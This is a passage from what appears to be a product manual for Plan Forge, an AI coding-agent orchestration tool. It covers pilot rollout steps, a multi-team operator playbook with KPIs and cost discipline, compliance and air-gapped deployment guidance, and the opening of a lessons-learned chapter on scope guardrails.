Step 6 — Pilot run (1–2 hr including observation)

Pick a real, small feature for the pilot. Not a toy. Not a refactor. A tangible feature with a clear acceptance criterion.

Run the full pipeline:

step0-specify-feature.prompt.md, define what & why
step1-preflight-check.prompt.md, verify prerequisites
step2-harden-plan.prompt.md, harden the plan into an execution contract
pforge run-plan --estimate <plan>, see projected cost under each quorum mode
pforge run-plan <plan>, execute (or --assisted for human-in-the-loop)
step5-review-gate.prompt.md, independent review

Watch for:

Drift between plan and PR, pforge diff should be clean. If it's not, the plan was too vague.
Gate failures, count them. Each gate failure is a lesson. Capture it as an instruction-file edit so future agents don't repeat.
Cost surprises, the estimate vs. actual delta tells you whether your plan complexity scoring is accurate.
Reviewer-agent noise, too quiet means the agent isn't loaded with enough context; too loud means the lanes are wrong.

Step 7 — Iterate: encode lessons in instruction files (ongoing)

Every Plan Forge project should be doing this constantly:

Friction point in a plan → update the relevant instruction file
Gate failure → tighten the gate or update plan-hardener prompt
Reviewer false positive → adjust the agent persona definition
Cost overrun → revise complexity threshold or quorum routing

The factory's value compounds. The first plan teaches you 5 things. The fifth plan teaches you 1. By the tenth plan, the agents are productive against your specific codebase, not generic.

Scaling the factory

After the first squad is productive, replicate to additional teams:

Fork the project profile for each team's repos (their stack may differ slightly)
Reuse the principles when teams share architectural commitments
Reuse the agent routing as a starting point; customize per team's review culture
Share the AGENTS.md content discipline, every team should be reading and refining their AGENTS.md monthly

For a 5-team / 1000-dev rollout, the factory typically takes:

Team 1: 2–3 days (figuring out the patterns)
Team 2: 1 day (with the patterns in hand)
Teams 3–5: 4 hours each (mostly project-profile customization)

Common mistakes

Mistake	Symptom	Fix
Generic project profile	Agents give generic advice; reviewers ignore them	Re-run `project-profile.prompt.md` with thoughtful answers, not defaults
No project principles	Agents drift outside scope; PRs widen unexpectedly	Run `project-principles.prompt.md`; document forbidden patterns explicitly
Default agent routing	Reviewers fire on irrelevant changes; humans tune them out	Document routing in `.github/agents/ROUTING.md` per team
Skip AGENTS.md customization	AGENTS.md-aware agents (Cursor, Claude Code) give weak suggestions	Read the generated AGENTS.md; add team-specific build/test/style content
One MCP server forever	Agents lack access to org-specific tools; humans bridge manually	Add Foundry Toolbox or in-house MCP servers as fleet matures
First plan is a toy	Lessons don't scale to real work	Pilot a real, small feature, never a hello-world
No iteration loop	Same friction in plan 2, plan 3, plan 4	After every plan, ask "what would make plan N+1 better?", encode the answer in instruction files

What success looks like

After 30 days with the factory in place:

Time from "feature spec" to "PR open" drops 50–70% for in-scope work
Plan Forge plans pass review with pforge diff clean ≥ 80% of the time
Per-team cost-per-merged-PR is tracked and trending stable or down
Reviewer agents catch 30–50% of issues before human review (depending on team and codebase)
Onboarding new engineers takes hours not weeks (the agents are the institutional knowledge)

These are real numbers from dogfooding. They scale linearly with the discipline applied to the factory configuration.

An ornate calendar timeline scroll with glowing milestones at Day 1, Week 4, Week 8, Week 12 (seedling, sapling, young tree, mature tree). Five tiny team-flag silhouettes float in formation above the timeline

Appendix M

Fleet Operator Playbook

A calendar, not a feature list. Day 1 / Week 4 / Week 12 milestones with concrete go/no-go criteria for operating Plan Forge across multiple product teams.

Audience: Platform leads operating Plan Forge across multiple product teams.

How to use: Each phase has a goal, activities, go/no-go criteria, and anti-patterns. If you're following it strictly and something feels off, that's a signal worth investigating, not a step to skip.

Day 0 — Prerequisites

Before you begin:

GitHub Enterprise + Copilot Enterprise + Copilot Cloud Agent enabled on target repos
LLM provider strategy decided (Anthropic, OpenAI, xAI, GitHub Copilot, Microsoft Foundry, or combination)
Pilot team identified (one team, 5–15 engineers, real product work, not a sandbox)
Executive sponsor named (someone who can defend cycle-time experiments at QBR)
Initial budget envelope set (~$2K–$10K for the first month per team, varies wildly)
OTel collector + observability backend chosen (Splunk, Datadog, Grafana, App Insights)

If any of these aren't true, work on them first. Plan Forge accelerates teams that already have direction; it doesn't substitute for it.

Day 1 — Pilot installation

Goal

Pilot team has Plan Forge installed, has run one plan end-to-end against a real (small) feature, and has a baseline measurement of cycle time and cost.

Activities (~4–6 hours total)

Install (30 min)
- Clone Plan Forge to each pilot dev's machine: git clone https://github.com/srnichols/plan-forge
- Or use the consumer-mode setup: setup.ps1 (Windows) or setup.sh (Mac/Linux) in target project
- Verify: pforge smith returns clean
Configure (1–2 hr), see Appendix L — Agent Factory Recipe Steps 2–5
- Run project-profile.prompt.md once for the pilot repo
- Run project-principles.prompt.md once
- Review and customize AGENTS.md and .github/copilot-instructions.md
- Configure .vscode/mcp.json with Plan Forge MCP server + github-mcp-server (and Foundry Toolbox if applicable)
First plan (2–3 hr including review)
- Pick a real, small feature (1–3 day's worth of human work)
- Run step0 through step5 of the pipeline
- Use pforge run-plan --estimate <plan> first to see projected cost
- Run pforge run-plan --assisted <plan> for human-in-the-loop the first time
- Compare PR diff to plan via pforge diff
Baseline metrics (30 min)
- Capture: total time spec → PR, total cost (LLM + Actions minutes), number of slices, number of gate failures, drift score
- Save to .forge/baseline-2026-05-06.json or your team's metrics store

Go/no-go criteria

Signal	Pass	Fail
First plan ran end-to-end	Yes	Stop, debug
`pforge diff` clean post-merge	Yes (drift score ≥ 80)	Plan was too vague, re-harden
Cost within 50% of estimate	Yes	Either pricing data is stale or workload differs from typical, investigate
Pilot team's reaction	"Useful, with caveats"	"Confusing" or "in the way", review configuration

Anti-patterns

Picking a toy feature, lessons don't scale to real work
Skipping --assisted first time, first plan should be observable
Running multiple plans in parallel before lessons land, waste of cost
Skipping the baseline measurement, you'll have nothing to compare against in Week 4

Week 1 — Pilot runs N plans

Goal

Pilot team runs 5+ plans, friction patterns become visible, instruction files start to encode lessons.

Activities

Daily standup adds 5 minutes for Plan Forge friction: each dev who used it that day flags one thing that didn't work
End of week: dedicated 1-hour retro
- What worked
- What didn't (be specific, instruction file, prompt, agent persona, gate, cost)
- What changed in .github/instructions/* as a result

Go/no-go criteria for Week 2

Signal	Pass	Fail
≥ 5 plans completed	Yes	Slow uptake, investigate barriers (often: fear of cost, unclear when to use vs not)
Drift score average ≥ 70	Yes	Plan-hardener prompt needs project-specific tuning
Instruction files updated ≥ 3 times	Yes	Team isn't iterating, that's the value loop, must enable it
Cost-per-PR trending down or stable	Yes	Cost going up plan-over-plan suggests waste, investigate slice sizing

Anti-patterns

Devs using Plan Forge for everything, it's wrong for trivial bug fixes; right for plan-able work
No iteration on instructions, the value compounds via instructions; if they're untouched, the team isn't learning
Hidden cost surprises, surface costs daily, not weekly, in the first month

Week 4 — Pilot graduation, second team onboarding

Goal

Pilot team is self-sufficient. Second team starts, with patterns from Pilot 1 captured as templates. First multi-team observability dashboards live.

Activities

Pilot graduation: pilot team operates Plan Forge without daily platform-team support. Platform team transitions to "office hours" model (1 hr / week).
Second team onboard (1 work day):
- Reuses pilot team's AGENTS.md style and .github/instructions/* (forks where stack differs)
- Reuses agent routing decisions from .github/agents/ROUTING.md
- First plan runs in --assisted mode
Multi-team observability:
- Both teams' OTel data flows to the same backend
- Dashboards: per-team plan throughput, per-team cost, per-team drift scores, gate failure heatmap across teams
- Plan Forge dashboard at localhost:3100 shows per-developer; the OTel backend shows org-wide
First quarterly KPI snapshot:
- Cycle time (spec → merged PR)
- Cost per merged PR
- Plan-Forge-driven PR percentage
- Drift / regression incidents caught at gate vs. caught in production

Go/no-go criteria for Week 8

Signal	Pass	Fail
Pilot team self-sufficient	Yes	Means platform team is still bottleneck, extract patterns into docs
Team 2 ran first plan within 1 day of onboarding	Yes	Onboarding pattern needs simplification
Multi-team dashboards reflect real data	Yes	OTel pipeline issue, fix before adding more teams
Cost per merged PR vs. baseline	Trending down or stable	If up, investigate model routing and slice sizing

Anti-patterns

Onboarding team 2 before team 1 is ready to teach, copy-paste failures multiply
Letting two teams diverge on instruction files, common ground is what makes the fleet feel like a fleet
Platform team trying to operate every team's Plan Forge instance, doesn't scale; build the office-hours model early

Week 8 — 4 teams active, fleet patterns formalized

Goal

4 of 5 teams active. Shared MCP server (Foundry Toolbox or in-house) deployed. Reviewer agents are catching real issues at PR time.

Activities

Add teams 3 and 4 in parallel using the Week 4 onboarding pattern (now refined)
Deploy shared MCP server:
- For MS-shop fleets: Foundry Toolbox with curated tools (Web Search, Code Interpreter, File Search, org-specific OpenAPI tools)
- For others: in-house MCP server hosted on Azure Container Apps / AWS App Runner / similar
- Update each team's .vscode/mcp.json to consume
Reviewer agent quality pass:
- For each of the 20 ship-default agents, look at the last 30 days of comments. Are they useful? Are they being acted on? Are they fired at the right cadence?
- Tune agent personas based on findings. Document in agent file changelog.
Cost guardrails formalized:
- Per-team budget caps in .forge.json
- Cost anomaly alerts via forge_alert_triage
- Cost-per-merged-PR target set per team based on Week 4 data
Drift / quality KPIs reported to engineering leadership:
- Plan adherence (% of PRs with pforge diff clean)
- Gate failure rate (overall, per team, trend)
- Regressions caught at gate vs. in production
- Cost per merged PR (per team, trend)
- Reviewer-agent acceptance rate

Go/no-go criteria for Week 12

Signal	Pass	Fail
4 teams active and self-sufficient	Yes	Onboarding pattern still has friction; investigate
Shared MCP server reduces per-team config drift	Yes	Adoption needs nudging, show concrete value
Reviewer-agent comments acted on ≥ 30% of the time	Yes	Personas need tuning, or routing is wrong
Cost guardrails preventing runaway	Yes	Budgets ineffective, likely too high or unenforced

Anti-patterns

Adding team 5 before teams 3 and 4 are stable, compounds confusion
MCP server becomes a kitchen sink, keep it curated; resist "add every API"
Reviewer agents never tuned, they degrade over time as the codebase evolves

Week 12 — Full fleet, first quarterly review

Goal

All 5 teams active. First quarterly review of fleet metrics. Plan for next quarter.

Activities

Add team 5 using mature onboarding pattern (now ~4 hours)
Quarterly review (half-day session):
- All KPIs reviewed (cycle time, cost-per-PR, drift, gate failures, reviewer-agent value, regressions caught)
- Each team presents one win and one friction
- Patterns extracted: what worked across teams, what's team-specific
- Roadmap for next quarter: which capabilities to add, which to retire, which instruction-file patterns to standardize
Eval data flywheel (begin if not already):
- Trajectories from completed runs become demonstrations for future runs
- forge_health_trend aggregates the quarter's data
- Memory architecture (/memories/repo/) captures the institutional learning
Document the fleet operations model:
- Who runs what
- On-call rotation for fleet-level issues
- Escalation path when Plan Forge has a defect (use forge_meta_bug_file)

Go/no-go criteria for next quarter

Signal	Pass	Fail
All 5 teams operating without daily platform support	Yes	Fleet is too dependent, invest in self-service
Cost per merged PR is below baseline	Yes	Diminishing returns, investigate where time is going
Quarterly KPIs trending right direction	Yes	Hypothesis was wrong somewhere, adjust
Engineering leadership confident in scale-out to next 5 teams	Yes	Trust gap, surface what's missing

Anti-patterns

Treating quarterly review as a status update, it's a planning session, not a report
Skipping eval flywheel, trajectories are an asset; ignored, they're just storage
No documented operations model, Plan Forge becomes one person's hobby instead of a fleet capability

KPIs

The metrics that matter at the fleet level:

KPI	Source	Healthy range
Cycle time (spec → merged PR)	OTel + git history	30–70% of pre-Plan-Forge baseline
Cost per merged PR	`forge_cost_report`	Stable or declining month-over-month
Plan adherence (drift score)	`forge_diff` per plan	≥ 80% of plans clean
Gate failure rate	`forge_health_trend`	< 30%; failures should drive instruction updates
Regressions caught at gate vs. production	Bug registry + OTel	Ratio improving over time
Reviewer-agent acceptance rate	Manual sampling	≥ 30% of comments acted on
Plan Forge plans / total PRs	`forge_health_trend`	Grows over time toward team comfort level
Per-engineer cost (when implemented)	Cost service (planned)	Outliers investigated, not punished
Time-to-green per slice	OTel + slice events	Stable or improving

Cost discipline

Three habits that make cost predictable:

Always estimate before running. pforge run-plan --estimate <plan> shows projected cost across all four quorum modes (auto, power, speed, false). Look at the numbers before the spend.
Quorum mode is a knob, not a default. power (Opus + GPT-5 + Grok consensus, threshold 5) is for high-stakes architectural slices. speed (cheaper models, threshold 7) is for high-volume routine work. auto makes a per-slice judgment. false is single-model. Use them deliberately.
Watch the per-slice retry count. Slices that retry 3+ times are usually either (a) gate is broken, (b) plan was too vague, or (c) wrong model for the task. Investigate, don't just absorb.

Cost attribution

Today, Plan Forge tracks cost per plan, per slice, per model. Per-engineer attribution is on the roadmap (planned), until then, the workaround is:

Each developer runs Plan Forge under their own user account
Their .forge/cost-history.json is their own ledger
Aggregate at the team level via OTel resource attributes (service.namespace, service.instance.id)

For finance teams that need formal chargeback, the OTel data is the source of truth, not the dashboard.

Multi-team operations

Two patterns work; pick one and stick with it:

Pattern A: Federated (recommended for most)

Each team owns its own Plan Forge installation, instruction files, and dashboard
Platform team owns the shared MCP server, the OTel pipeline, and cross-team KPIs
Quarterly cross-team learning session

Pros: teams move at their own pace, instruction files reflect team culture, no central bottleneck.
Cons: harder to enforce org-wide patterns.

Pattern B: Centralized

Platform team owns the canonical instruction files, agent personas, and quorum presets
Teams consume from a shared .github-private/ template repo
Changes to shared assets require platform-team review

Pros: consistency across teams, easier compliance posture.
Cons: bottlenecks if platform team is small; teams may resent loss of autonomy.

The right answer depends on your engineering culture. Federated works for cultures that value team autonomy; centralized works for cultures that value consistency.

Escalation: when Plan Forge itself has a defect

Plan Forge is software. Software has bugs. The escalation path:

Self-repair first: agents can file meta-bugs against Plan Forge with forge_meta_bug_file when they encounter a defect during execution. The tool routes to the Plan Forge GitHub repo with a stable hash to deduplicate
Workaround in instruction files: if the defect is reproducible and you can route around it via instructions, do so and document the workaround
GitHub issue at srnichols/plan-forge for non-emergency defects
Pin a working version in package.json if a recent release introduced the defect; rollback is one npm install away

Plan Forge is open source. There is no commercial support tier today. The escalation model is community + your own platform team's competence.

Common operational mistakes

Mistake	Symptom	Fix
Adding teams faster than the fleet can absorb	Inconsistent quality, cost surprises, frustrated devs	One team at a time until self-sufficient; don't compress for OKR optics
Skipping the iteration loop	Same friction in plan 50 as in plan 5	Mandate post-plan retro; encode lessons in instructions
Treating Plan Forge as "set it and forget it"	Quality degrades; agents feel stale	It's a living configuration; budget time monthly to maintain
Reviewer agents fire on everything	Humans tune them out; signal lost	Tune routing per team; advisory ≠ blocking ≠ escalation
Cost reports go unread	Surprises at month-end	Daily cost dashboard for first month, weekly thereafter
No on-call for fleet-level Plan Forge issues	One engineer is the SPOF	Document operations model; rotate ownership
Eval data ignored	Trajectories accumulate; learning doesn't compound	Quarterly review trajectories; promote useful patterns

A massive glowing golden vault door embedded in the forge wall, slightly ajar with warm light pouring out. An illuminated audit ledger on the workbench. Ghost-translucent compliance seals drift in ember trails around the vault

Appendix N

Compliance and Data Residency

Where data lives, what's logged, how to export for audit, identity (today and roadmap), and the air-gapped / Azure Government deployment paths.

Audience: Security architects, compliance officers, and platform leads conducting a security review of Plan Forge.

Scope: Where data lives, what's logged, how to export for audit, identity model (today and roadmap), and the air-gapped / Azure Government deployment paths.

TL;DR for security review

Plan Forge is local-first. The orchestrator runs on the developer's machine or a CI runner inside the customer's network. There is no Plan Forge SaaS service. Source code does not leave the customer's network unless the customer chooses to call a hosted LLM (and even then, all logging stays local). The audit trail is structured, complete, and exportable. Identity is currently bearer-token only and is the largest gap on the roadmap.

Concern	Status
Source code leaves network	Only when customer-configured LLM provider is hosted; all logging stays local
Audit log of agent actions	Structured, complete, production-grade today (`telemetry.mjs`, `EVENTS.md`)
Audit log export	OTel exporter on roadmap (Week 2 of enterprise hardening); manual export available today
Identity / SSO	Bearer token only today; Entra ID / SAML / SCIM on roadmap
RBAC	None today; on roadmap
Data residency controls	Customer chooses LLM provider region; Plan Forge respects
Air-gapped deployment	Architecturally supported; documentation gap (this doc)
Encryption at rest	Customer's filesystem encryption (Plan Forge respects)
Secret redaction	Built-in for testbed findings; configurable scope on roadmap
FedRAMP / IL5 / IL6 / HIPAA / PCI / SOC2	Plan Forge is OSS, compliance posture is the customer's deployment, not a Plan Forge certification

Data flow

Five concrete data movements. For each, who handles the data and where it goes.

1. Source code

Stays in the customer's network, except for:

The bytes of files you choose to send to a hosted LLM as part of a prompt (Anthropic API, OpenAI API, GitHub Copilot, etc.)
The bytes of code Copilot Cloud Agent reads on its GitHub-hosted ephemeral runner (subject to GitHub's data handling)

If you use only on-prem inference (Foundry Local, Ollama, vLLM, llama.cpp, etc.), source code never leaves your network for any reason.

2. Plan files

Stay in the customer's repo. Plan files (docs/plans/*.md) are committed to git. They live wherever the repo lives.

3. `.forge/` artifacts

Stay on the local filesystem (developer machine or CI runner). Includes:

.forge/runs/<id>/, per-run trajectory, events, slice artifacts, summary, traces, cost history
.forge/cost-history.json, aggregate cost
.forge/telemetry/tool-calls.jsonl, MCP tool invocations
.forge/liveguard-events.jsonl, LiveGuard scan events
.forge/trajectories/<plan-slug>.jsonl, Copilot Coding Agent trajectories (when CCA is the worker)
.forge/fm-sessions/*.jsonl, Forge-Master conversation sessions

.forge/ is gitignored by default. It can be committed for audit purposes if your security policy requires.

4. Memory

Three tiers, three different residency stories:

Tier	Location	Lifetime	Notes
L1 (volatile hub)	In-process RAM	Per-process	Bounded ring buffer, evicted on restart
L2 (structured)	Local filesystem (`.forge/`, `.github/`, `docs/plans/`)	Persistent	Survives restart; lives where the repo lives
L3 (semantic via OpenBrain)	External Postgres + pgvector (optional)	Forever	Cross-project by design. If used, deploy the Postgres in your network

If L3/OpenBrain is not configured, Plan Forge runs single-project, single-session memory only. No external service required.

5. Telemetry / observability

By default, telemetry stays local in .forge/telemetry/. With the OTel exporter (Week 2 of enterprise hardening), traces and metrics are emitted in the OpenTelemetry gen_ai.* semantic-convention format to a customer-chosen OTLP endpoint. Common targets:

Splunk Observability Cloud
Datadog
Grafana Tempo / Mimir / Loki
Microsoft Application Insights (especially relevant for Foundry-attached deployments)
Honeycomb
Customer-hosted OTel Collector forwarding anywhere

The OTel exporter is off by default. Enable by setting OTEL_EXPORTER_OTLP_ENDPOINT.

Audit logging

What's logged

Plan Forge emits structured events for 38 event types across eight families. The full ebook reference, envelope, enums, payloads, retention, is Appendix V — Event Catalog; the canonical JSON schema lives in pforge-mcp/EVENTS.md. Categories include:

Plan execution lifecycle (run-started, slice-started, slice-completed, run-completed)
Worker LLM calls (model, provider, token counts, latency, cost)
MCP tool invocations (tool name, args [optional], result [optional])
Validation gate execution (gate name, result, duration)
Quorum dispatch (quorum-started, quorum-model-replied, quorum-synthesized)
LiveGuard scans (drift-, incident-, secret-scan-, dep-watch-)
Crucible smelts (idea funnel)
Tempering runs (plan hardening)
Bug registry (open, status changes)
Skill execution (start, step, complete)
Watcher events (when one project tails another)

Each event carries:

ISO8601 timestamp
Event type
Correlation ID (groups events from the same run)
Source (which subsystem emitted it)
Severity (TRACE / DEBUG / INFO / WARN / ERROR / FATAL)
Type-specific data payload

Where it's logged

Sink	Format	Retention
`.forge/runs/<id>/events.log`	NDJSON	Per-run, kept until manual cleanup
`.forge/runs/<id>/trace.json`	OTLP-compatible	Per-run
`.forge/telemetry/tool-calls.jsonl`	NDJSON, append-only	Persistent
`.forge/liveguard-events.jsonl`	NDJSON, append-only	Persistent
Hub event stream	In-memory + WebSocket	Volatile (last N events)

How to export for audit

Today (manual):

# Aggregate all events from a date range
jq -s 'sort_by(.ts)' .forge/runs/*/events.log > audit-export.json

# Or use forge_search for filtered export
pforge search --since 2026-04-01 --sources run,liveguard,bug --output audit.json

Roadmap (Week 2 of enterprise hardening): pforge audit export --since <date> --format <json|csv> as a first-class CLI.

Secret redaction

Built-in for testbed findings (defect-log.mjs). High-entropy secret detection in diffs (forge_secret_scan) always redacts values; findings are masked before caching or display. Plan to formalize as a configurable scope in Week 3 (auth/RBAC scaffolding).

Identity and authentication

Today

Plan Forge supports:

Bearer token for write operations against the dashboard / hub (configured as bridge.approvalSecret in .forge.json)
API keys loaded from environment variables or .forge/secrets.json for LLM providers (OpenAI, Anthropic, xAI, GitHub Copilot, Azure OpenAI when manually configured)

Known secrets recognized:

GITHUB_TOKEN
XAI_API_KEY
OPENAI_API_KEY
ANTHROPIC_API_KEY
OPENCLAW_API_KEY

Not yet supported as first-class:

AZURE_OPENAI_API_KEY + endpoint URL (works manually; first-class config on roadmap)
Entra ID / SAML / SCIM
OAuth flows

Identity roadmap

Order of priority based on enterprise requests:

BYO Azure OpenAI first-class (Week 3 of enterprise hardening), AZURE_OPENAI_API_KEY and endpoint as recognized secrets, deployment-name vs model-name handled in config, Entra ID auth via azure-identity SDK
Auth model documentation + extension point (Week 3), describes how Plan Forge thinks about identity today and the planned model. Adds a clear interface for plugging in SSO providers
Config-driven RBAC scaffold (Week 3), roles, permissions, who can do what (enforcement basic; structure right)
Entra ID SSO (post-Week-4), full implementation
SAML / SCIM (later), driven by enterprise demand

If your security review requires SSO/SCIM/RBAC today, Plan Forge is not a fit. The honest answer matters more than overpromising.

Compliance posture

Plan Forge is open-source software (MIT license). Compliance certifications (FedRAMP, IL5/IL6, HIPAA, PCI-DSS, SOC2) attach to the customer's deployment of Plan Forge, not to Plan Forge itself. There is no Plan Forge SaaS to certify.

Even so, several Plan Forge architectural choices are friendly to compliance audits:

Posture	What helps
No SaaS data plane	Nothing to subpoena from a vendor; data lives where you put it
Structured audit trail	Every action logged with timestamps, correlation IDs, severity
Open source	Auditable end-to-end; no proprietary closed binaries
Local-first by default	Air-gapped deployment is structurally possible (see below)
Open standards	AGENTS.md, MCP, OTel `gen_ai.*`, no proprietary lock-in to challenge
Compliance reviewer agent	`.github/agents/compliance-reviewer.agent.md` ships out of the box for GDPR/CCPA/SOC2/HIPAA-aware code review
Project profile compliance frameworks	`.github/prompts/project-profile.prompt.md` collects SOC2, HIPAA, PCI-DSS, GDPR, FedRAMP early in setup

For specific frameworks:

SOC2 Type II

Audit trail completeness: ✓ (events, traces, run artifacts)
Access controls: ⚠ (bearer token today; SSO/RBAC on roadmap)
Change management: ✓ (git-based plan files, scope contracts, gates)
Encryption in transit: ✓ for LLM API calls; ✓ for OTel export when configured with TLS
Encryption at rest: customer's filesystem encryption

HIPAA

BAA: not applicable (no Plan Forge SaaS to BAA)
Customer's BAA with their LLM provider applies to inference data
Audit log: structured and complete
PHI handling: customer's responsibility, Plan Forge does not pre-process content

PCI-DSS

Scope reduction: Plan Forge does not handle payment data unless customer-configured to read it. Recommend isolating any PCI-relevant code review to dedicated Plan Forge instances with strict secret scanning enabled.
Secret handling: built-in detection + redaction for high-entropy strings in diffs

FedRAMP / IL5 / IL6

Plan Forge is deployable in Azure Government and on-prem environments that match FedRAMP / IL boundaries
Use only FedRAMP-authorized LLM providers (Azure OpenAI in Azure Government has FedRAMP-authorized models, gpt-5.1, gpt-4.1, o3-mini, gpt-4o)
Plan Forge itself does not require FedRAMP authorization (it's software you run, not a service you consume)

Data minimization: Plan Forge does not collect personal data unless customer-configured
Right to access / delete: applies to data the customer chooses to capture; .forge/ artifacts are deletable

Air-gapped deployment

Plan Forge is architecturally compatible with fully air-gapped deployment. The complete pattern:

What works air-gapped

Plan Forge orchestrator (Node.js process; no inbound network calls required)
Dashboard (localhost:3100)
Plan execution against local repos
All .forge/ artifact storage
L1 (in-memory) and L2 (filesystem) memory tiers
OTel export to in-network OTel collector
Validation gates (run locally as shell commands)

What requires special handling air-gapped

Component	Air-gapped solution
LLM inference	Use Foundry Local powered by Azure Local (preview May 2026), Ollama, vLLM, llama.cpp, or similar on-prem inference. Configure as the OpenAI-compatible endpoint Plan Forge talks to.
GitHub Enterprise	Use GitHub Enterprise Server (GHES) instead of GitHub.com. Plan Forge supports GHES; Cloud Agent local-MCP-server pattern works
Update checks	Set `PFORGE_NO_UPDATE_CHECK=1` to disable. Manual updates via `pforge self-update --from-local <path>` or repo sync from internal mirror
OpenBrain L3 memory	Optional; if used, deploy the Postgres+pgvector inside the boundary
MCP servers	Self-host any MCP server you want available; point `.vscode/mcp.json` at internal endpoints only

What does NOT work air-gapped

Plan Forge Hub WebSocket connections to external observability (configure local OTel collector instead)
Any LLM provider that requires public internet (configure on-prem inference instead)
The community extensions catalog (use pforge ext add --from-local <path> for vetted extensions)

Deployment checklist for air-gap

On-prem LLM inference deployed (Foundry Local / Ollama / vLLM)
GHES instead of GitHub.com (or no GitHub at all if your VCS is internal)
Internal git mirror for srnichols/plan-forge updates
OTel collector inside the boundary
OpenBrain (if using L3 memory) deployed inside the boundary
All MCP server endpoints internal
PFORGE_NO_UPDATE_CHECK=1 set
Network egress audit confirms zero outbound to public internet

This is the differentiator vs. competitors. Cursor cannot offer this (control plane in AWS even with self-hosted workers). Sourcegraph Amp explicitly cannot (no self-host, no BYOK). GitHub Copilot Cloud Agent runs on GitHub-hosted infrastructure. For air-gapped requirements, Plan Forge is structurally the only viable option in the comparison set.

Azure Government

For customers deploying in Azure Government:

What works

Plan Forge orchestrator running on Azure Government VMs / AKS / Functions
Azure OpenAI in Azure Government as the LLM provider
Endpoint domain: openai.azure.us (not openai.azure.com)
Auth: login.microsoftonline.us Entra ID (when first-class Entra support lands)
Today: API key auth works via the manually-configured Azure OpenAI path

Model availability

Azure Government has a substantially smaller catalog than commercial Azure:

gpt-5.1
gpt-4.1
gpt-4.1-mini
o3-mini
gpt-4o
Embeddings: text-embedding-3-large, text-embedding-3-small, text-embedding-ada-002

Available in usgovarizona and usgovvirginia, with Data Zone Standard and Provisioned variants.

Plan Forge implications

The default power quorum preset (assumes flagship models like gpt-5.5 or claude-opus-4.7) won't resolve cleanly
Use a power-gov preset (planned) or graceful fallback
The speed preset works (gpt-4.1-mini exists in gov)

Compliance certifications inherited

Both global Azure and Azure Government are FedRAMP High. Azure Government adds contractual commitments around US-based data storage and screened-US-persons access. HIPAA and PCI are covered under Azure's standard compliance umbrella for the underlying services; Plan Forge running on top inherits the boundary.

For Azure Government Secret and Top Secret cloud feature availability, contact your Microsoft account team, public documentation is limited.

Observability export

The Week 2 work in the enterprise hardening track adds first-class OpenTelemetry export. Spec is documented in the enterprise-fleet-readiness research §8.6. Summary:

What gets emitted

Spans for every LLM call (CLIENT, kind chat/embeddings/etc.) with full gen_ai.* attribute set including token counts (input, output, cache_read, cache_write, reasoning), latency, model, provider
Spans for every MCP tool call (INTERNAL, kind execute_tool) with tool name and call ID
Spans for every slice (INTERNAL, kind invoke_agent) with plan/slice correlation
Spans for every plan run (INTERNAL, kind invoke_workflow)
Spans for every validation gate (INTERNAL, plan-forge-vendor namespace)
Metrics, gen_ai.client.operation.duration histogram, gen_ai.client.token.usage histogram
Events (opt-in), gen_ai.client.inference.operation.details with input/output messages (gated by pforge.telemetry.captureContent flag, default off, PII implications)

Vendor-namespaced extensions

pforge.* attributes for plan/slice/run correlation, scope contract IDs, gate names, cost USD (since gen_ai.cost doesn't exist in the spec).

Backends supported

Anything that speaks OTLP. Tested compatibility (planned for Week 2):

Splunk Observability Cloud
Datadog
Grafana Tempo
Microsoft Application Insights (especially relevant for Foundry-attached deployments, Foundry uses the same OTel gen_ai.* conventions, so Plan Forge runs land in the same dashboards as the customer's Foundry agents)
Honeycomb
Customer-hosted OTel Collector

Privacy controls

Content capture (prompt + completion text) is opt-in by default
Three patterns supported: don't capture / capture as span attributes / externalize via hook to a separate store with only references on the span
Toggle via pforge.telemetry.captureContent config flag and standard OTel env vars

Common security review questions

Where can our source code go?

Wherever you choose to send it via your configured LLM provider. With on-prem inference, nowhere outside your network. Plan Forge itself never transmits source code.

Does Plan Forge phone home?

No telemetry is transmitted to Plan Forge maintainers. The optional update check fetches release metadata from GitHub. Disable with PFORGE_NO_UPDATE_CHECK=1.

Can we audit every action an agent took?

Yes. Per-run trajectory in .forge/runs/<id>/ includes events, slice artifacts, traces, cost history, and (for CCA-dispatched runs) the full Copilot Cloud Agent trajectory.

How do we prevent agents from editing files outside scope?

Plan Forge enforces scope contracts at the plan level (In Scope, Out of Scope, Forbidden Actions blocks). Pre-tool-use hooks block edits to forbidden paths. Post-execution pforge diff checks for drift.

Honest gap: enforcement is best-effort at the worker level, the orchestrator can't always prevent a bad edit, only detect it. Roadmap item to harden.

What happens if an agent malfunctions?

Per-slice workerTimeoutMs cap kills runaway workers. Reflexion retry with backoff handles recoverable failures. forge_alert_triage ranks issues by priority. In-loop stuck detector is on the roadmap (OpenHands-pattern).

Can we enforce a budget per team?

.forge.json per repo supports cost.dailyMax and similar caps (planned formalization). Per-engineer attribution is on the roadmap.

What's the data retention model?

Plan Forge does not delete .forge/ artifacts automatically. Retention is the customer's policy, implement via standard filesystem tools or post-run cleanup hooks.

Are LLM responses cached?

Plan Forge does not cache LLM responses. Some LLM providers (Anthropic, OpenAI) do prompt caching, that's their infrastructure, billed at reduced rates. Plan Forge tracks cache hit/miss for cost accuracy (Phase-COST-TOKEN-COVERAGE landed the per-vendor billing math).

How do we know Plan Forge itself isn't compromised?

Open source. MIT license. Audit the code. Plan Forge is dogfooded against itself, every release ships through the same Plan Forge pipeline that customers use. Self-repair tooling (forge_meta_bug_file) gives agents a way to file defects against Plan Forge during execution.

An aged leather-bound tome open on the workbench at the Plan Forge shop, its pages glowing softly with rune annotations and small ember sparks rising upward from each lesson, a quill resting in an inkwell beside it, broken hammers and dented anvils visible in the dim background as evidence of past mistakes

Reference

Lessons Learned

Seven principles behind Plan Forge's architecture, what each one prevents, where it is enforced.

When to read this chapter: reviewing why Plan Forge enforces what it enforces, onboarding to the architecture, or evaluating whether a proposed change conflicts with a foundational principle.

Reference adaptation of the marketing essay I Built Guardrails for AI Coding Agents — Here's What I Learned (April 2026). The blog tells the story; this chapter captures the principles.

Lesson 1 — Agents Don't Drift Maliciously; They Drift Because No Rule Said Stop

Principle: Define what should not be built, not just what should. Explicit prohibitions cut scope drift by, to quote the source, "an order of magnitude" (guardrails-lessons-learned blog).

Failure mode it addresses: An agent asked to "build a login page" produces a login page plus a password reset flow, an admin panel, a user profile system, and refactored database migrations. The agent is not being creative, it is being thorough with zero scope constraints.

Where it is enforced: Every hardened plan ships a Forbidden Actions section in the Scope Contract. The PreToolUse lifecycle hook (see How It Works → Building Blocks) blocks file edits to paths listed in the active plan's Forbidden Actions. The pattern is enforced by the plan-hardening prompt, not left to the executing agent's discretion.

